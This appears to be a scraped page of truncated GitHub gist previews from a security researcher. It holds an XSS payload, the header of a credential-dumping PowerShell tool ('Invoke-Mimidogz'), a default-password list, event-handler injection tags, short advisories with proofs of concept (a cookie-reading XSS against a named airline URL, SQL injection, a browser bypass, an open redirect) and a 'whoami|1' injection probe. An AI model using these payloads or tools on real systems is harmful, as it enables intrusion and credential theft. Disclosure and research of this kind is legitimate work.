This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width"> | |
<title>JS Bin</title> | |
</head> | |
<body> | |
<object/onerror=write`1`// | |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-Mimidogz | |
{ | |
[CmdletBinding(DefaultParameterSetName="DumpCred")] | |
Param( | |
[Parameter(Position = 0)] | |
[String[]] | |
$ComputerName, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
admin | |
test | |
secret | |
guest | |
1234 | |
123456 | |
demo123 | |
demo | |
password123 | |
password1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Name : PIHOME RaspberryPi - Home Automation | |
Vendor Homepage : http://pihome.harkemedia.de/ | |
Vulnerability Type : Sql Injection | |
Researcher : Evren Yalçın <evren [at] superbug [dot] co> | |
Details : | |
1- Sql Injection : | |
Source Code: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Name : United Airlines XSS Vulnerability | |
Vendor Homepage : http://www.united.com | |
Vulnerability Type : Cross-Site Scripting | |
Researcher : Evren Yalçın <evren [at] superbug [dot] co> | |
Example PoC is as follows : | |
http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4= | |
---- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser | |
Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable | |
Vendor Homepage : http://www.vivaldi.net | |
Vulnerability Type : Cross-Site Scripting | |
Researcher : Evren Yalçın <evren [at] superbug [dot] co> | |
Description | |
Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner.The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features. | |
Details |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Zafiyet Hakkında | |
================ | |
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet | |
Proof of concept | |
================ | |
https://sso.tpo.com/members/edit?success_url=//google.com | |
Zaman Çizelgesi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
whoami|1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
import socket | |
import random | |
import time | |
dosya = open("liste.txt","r") | |
ipAddress=[] | |
for i in dosya: | |
ipAddr = i | |
hexAllFfff = "18446744073709551615" |